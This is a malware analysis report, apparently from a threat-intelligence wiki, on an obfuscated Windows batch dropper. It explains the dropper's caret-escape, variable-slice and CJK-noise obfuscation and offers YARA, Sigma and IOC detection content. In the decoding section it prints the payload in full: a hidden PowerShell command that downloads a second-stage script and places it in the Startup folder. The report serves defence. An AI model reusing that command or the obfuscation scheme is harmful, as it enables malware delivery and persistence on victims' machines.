448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193unclassified-rouki-obfuscator-batch-dropper: 448682ebd8 — 5.8 MB kaomoji-and-CJK noise batch dropper with Chinese-variable slice encoding
Executive Summary
A 5.8 MB Windows batch dropper obfuscated by the open-source Rouki-OBFUSCATOR (author EscaLag, GitHub github.com/rouki). The script uses a multi-tier noise injection: kaomoji emoticons, Arabic script fragments, CJK ideographs, and undefined variable blocks pad the visible surface, while the real payload is encoded via %PUBLIC:~n,1%-driven command construction and %chinese_var:~n,1% string-slice substitution. Execution chain: self-write decoded payload to disk → echo a 289 KB base64 blob → start /min powershell.exe to download a GitHub-hosted second-stage .bat and persist it to the user Startup folder. Static-only; CAPE skipped (not a binary). ^[file.txt]
What It Is
| Field | Value |
|---|---|
| SHA-256 | 448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193 |
| File name | Dental records + x-rays.bat ^[metadata.json] |
| Size | 5,776,593 bytes (5.8 MB) ^[metadata.json] |
| Type | Unicode text, UTF-8 text, with very long lines (31823), with CRLF line terminators, with escape sequences ^[file.txt] |
| YARA | None ^[yara.txt] |
| CAPE | Skipped — not a supported binary class ^[dynamic-analysis.md] |
Build provenance. The file opens with a batch label :Rouki-OBFUSCATOR and two SET metadata lines naming author EscaLag and GitHub github.com/rouki ^[strings.txt:8-10]. These match the open-source Rouki batch obfuscator, a commodity tool sold/shared on crimeware forums. The binary is a plain-text .bat file with 25 CRLF-delimited logical lines, one of which is a 3.4 M character payload line. ^[strings.txt]
Obfuscation tiers.
-
Tier 1 — caret escape splitting. Every batch keyword is broken with
^insertion (ec^%…%ho,cl^%…%s,se^%…%t) so naive regex string matching fails. 175 caret escapes observed. ^[strings.txt:1-20] -
Tier 2 —
%public:~n,1%command assembly. The literal stringsetis spelled character-by-character by slicing%PUBLIC%(defaults toC:\Users\Public):s=%public:~0,1%,e=%public:~5,1%,t=%public:~4,1%. Thirteen such slices build the firstsetcommand. ^[strings.txt:20-22] -
Tier 3 — kaomoji/emoji/CJK/Arabic noise blocks. Undefined
%var%expansions containing kaomoji (ヾ(⌐■_■)ノ,┌(ಠ_ಠ)┘,◕‿◕,⊙ω⊙), Arabic script fragments, and CJK ideographs (製秘魔文的訊, 無神法無已) are scattered between tokens. Because these variables are never defined, they expand to empty strings at runtime, serving purely as anti-static padding. 388 kaomoji blocks, 40 Arabic fragments, 290,853 CJK characters. ^[strings.txt:6-13] -
Tier 4 — Chinese-character variable names with 65-char substitution alphabets. Five variables are defined with 65-character values:
爱豆尔斯,耻色耻维,色斯阿斯,贝贝维爱,饿贝豆尔. The payload is then encoded as ~290,000%varname:~n,1%slice tokens referencing these alphabets. Each variable value is a permutation of printable ASCII mixed with@,=, and space. ^[strings.txt:21-97] -
Tier 5 — 289 KB base64 echo + PowerShell download-and-persist tail. After decoding, the script writes a 289,787-character base64 string via
@echo, then appends a PowerShellDownloadFilecommand that fetcheshttps://github.com/urerfie/base/raw/main/zdd.batand drops it to%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat. ^[decoded_payload_tail]
How It Works
Entry point
Line 0 disables codepage echo and clears the screen via caret-escaped fragments. A for /l %%i in (1,1,1) infinite loop checks whether __author__ or __github__ are defined; if so, it prints Rouki OBFUSCATION and exits — a watermark/tamper gate. ^[strings.txt:1-28]
Variable bootstrap
The first variable (爱豆尔斯) is set literally with a 65-character value: ghHJCnyOqS FaxpDews7BofT9i0NjrLlQzG2@IAKPR3v5tMY=UXVuc864mEbkZ1Wd ^[strings.txt:21]. The remaining four variables (耻色耻维, 色斯阿斯, 贝贝维爱, 饿贝豆尔) are defined via %爱豆尔斯:~n,1% slice tokens, chaining the substitution alphabet forward. ^[strings.txt:28-97]
Payload decode
A single 3.4 M character line (segment 19) contains 290,064 %varname:~n,1% slice tokens. Decoding this line with the five substitution alphabets produces:
@echo [289,787 chars base64]echo offstart /min powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/urerfie/base/raw/main/zdd.bat', '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat');"^[decoded_payload]
The 217,340-byte base64 blob decodes to high-entropy data with no recognizable header (no MZ, ELF, PK, PDF, or GZIP magic). It is likely an encrypted inner payload, a decoy, or padding whose real purpose only resolves at second-stage execution. ^[decoded_base64_analysis]
Persistence
The PowerShell command stages the downloaded .bat into the user Startup folder with the masquerade name WindowSecuryti.bat. On next logon, Windows executes it automatically. ^[decoded_payload_tail]
C2 Infrastructure
| Indicator | Value | Type |
|---|---|---|
| Second-stage URL | https://github.com/urerfie/base/raw/main/zdd.bat |
Download URL |
| Persistence path | %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat |
File system |
| Social-engineering lure | Dental records + x-rays.bat |
Filename |
No hardcoded IPs, domains beyond the GitHub raw URL, mutexes, or registry keys observed. The GitHub user urerfie is the only static C2 artifact. ^[decoded_payload_tail]
Interesting Tidbits
- Open-source tooling as threat artifact. The
:Rouki-OBFUSCATORwatermark and author metadata make attribution to the tool trivial for a human analyst, yet the same metadata defeats fully automated triage that stops at file-type classification (Unicode text). ^[strings.txt:8-10] - Startup-folder persistence without UAC elevation. The script writes to the user Startup folder (
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), not the system-wide%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp, meaning it succeeds without admin privileges. ^[decoded_payload_tail] - TLS 1.2 pinning. The PowerShell command explicitly forces
[Net.SecurityProtocolType]::Tls12, a common pattern in commodity droppers that break on older Windows versions with default SSL3/TLS 1.0. ^[decoded_payload_tail] - Masquerade name
WindowSecuryti. The typo (Securytiinstead ofSecurity) is likely intentional to evade naive string matching for "Windows Security." ^[decoded_payload_tail] - No dynamic analysis possible. CAPE skipped because the sample is not a PE. Any behavioral analysis must be performed via manual batch emulation or sandboxing with a Windows guest that handles
.batfiles natively. ^[dynamic-analysis.md]
Deployable Signatures
YARA
rule rouki_obfuscator_batch_dropper
{
meta:
description = "Rouki-OBFUSCATOR batch dropper with kaomoji/CJK noise and Chinese-variable slice encoding"
author = "PacketPursuit"
date = "2026-08-12"
reference = "/intel/analyses/448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193.html"
strings:
$label = ":Rouki-OBFUSCATOR" nocase ascii wide
$author = "__author__=EscaLag" ascii wide
$github = "__github__=github.com/rouki" ascii wide
$kaomoji1 = "ヾ(⌐■_■)ノ" ascii wide
$kaomoji2 = "┌( ಠ_ಠ)┘" ascii wide
$kaomoji3 = "◕‿◕" ascii wide
$public_slice = "%public:~" ascii wide
$chinese_var1 = "爱豆尔斯" ascii wide
$chinese_var2 = "耻色耻维" ascii wide
$chinese_var3 = "色斯阿斯" ascii wide
$chinese_var4 = "贝贝维爱" ascii wide
$chinese_var5 = "饿贝豆尔" ascii wide
condition:
$label and ($author or $github) and $public_slice and 2 of ($chinese_var*)
}
Behavioral hunt query (Sigma)
title: Rouki Obfuscator Batch Dropper Execution
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\cmd.exe'
CommandLine|contains:
- 'WindowSecuryti'
- 'github.com/urerfie'
- 'zdd.bat'
CommandLine|contains|all:
- 'powershell.exe'
- 'DownloadFile'
- 'Tls12'
condition: selection
falsepositives:
- Unknown
level: high
IOC list
| Indicator | Type | Context |
|---|---|---|
448682ebd829c6c05dda879d4609106d8c115b80ac1df15e0f4d28dd7176c193 |
SHA-256 | Original dropper |
Dental records + x-rays.bat |
Filename | Social-engineering lure |
https://github.com/urerfie/base/raw/main/zdd.bat |
URL | Second-stage payload |
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat |
File path | Persistence |
:Rouki-OBFUSCATOR |
Batch label | Tool watermark |
__author__=EscaLag |
String | Tool metadata |
github.com/rouki |
String | Tool metadata |
Behavioral fingerprint
A .bat file exceeding 5 MB with :Rouki-OBFUSCATOR label, EscaLag author metadata, and thousands of %public:~n,1% slice tokens interleaved with kaomoji/CJK noise blocks. At runtime it decodes a base64 blob and spawns powershell.exe -WindowStyle Hidden with DownloadFile to a GitHub raw URL, staging the result to the user Startup folder.
Detection Signatures (ATT&CK)
| Technique | ID | Evidence |
|---|---|---|
| User Execution: Malicious File | T1204.002 | .bat dropper with social-engineering filename |
| Command Obfuscation | T1027.010 | Caret escape, %var:~n,1% slice encoding, kaomoji/CJK noise padding |
| Ingress Tool Transfer | T1105 | PowerShell DownloadFile fetches second-stage .bat |
| Boot or Logon Autostart Execution: Startup Folder | T1547.001 | Drops to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryti.bat |
| Application Layer Protocol: Web Protocols | T1071.001 | HTTPS download via System.Net.WebClient |
| Data Encoding: Standard Encoding | T1132.001 | Base64 blob written via @echo |
References
- Artifact ID:
24dd1565-9cd7-403a-ad0b-dd4465ca5fd4 - Source: OpenCTI / MalwareBazaar
- Related wiki pages: unclassified-rouki-obfuscator-batch-dropper, batch-kaomoji-cjk-noise-obfuscation, unclassified-batch-powershell-dropper
- Tool reference:
github.com/rouki(Rouki-OBFUSCATOR)
Provenance
file.txt— file type, size ^[file.txt]metadata.json— artifact metadata ^[metadata.json]triage.json— triage record ^[triage.json]strings.txt— raw strings with line refs ^[strings.txt:1-97]rabin2-info.txt— confirmsbits=0,havecode=false(not a binary) ^[rabin2-info.txt]dynamic-analysis.md— CAPE skipped (not supported binary class) ^[dynamic-analysis.md]yara.txt— no YARA matches ^[yara.txt]- Decoded payload analysis performed via Python script on
<sample 448682ebd829.bin>